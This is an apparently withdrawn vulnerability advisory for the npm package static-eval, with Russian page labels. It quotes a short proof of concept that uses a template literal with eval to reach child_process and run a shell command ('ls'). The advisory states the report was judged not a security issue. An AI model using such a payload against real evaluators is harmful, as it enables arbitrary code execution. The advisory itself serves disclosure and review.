Описание
Withdrawn: Arbitrary Code Execution in static-eval
All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)
WITHDRAWN
This was deemed not a vulnerability. See this issue for details.
Пакеты
static-eval
<= 2.1.0
Отсутствует
Связанные уязвимости
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none
Уязвимость функций FunctionExpressions и TemplateLiterals пакета static-eval пакетного менеджера NPM, позволяющая нарушителю выполнить произвольный код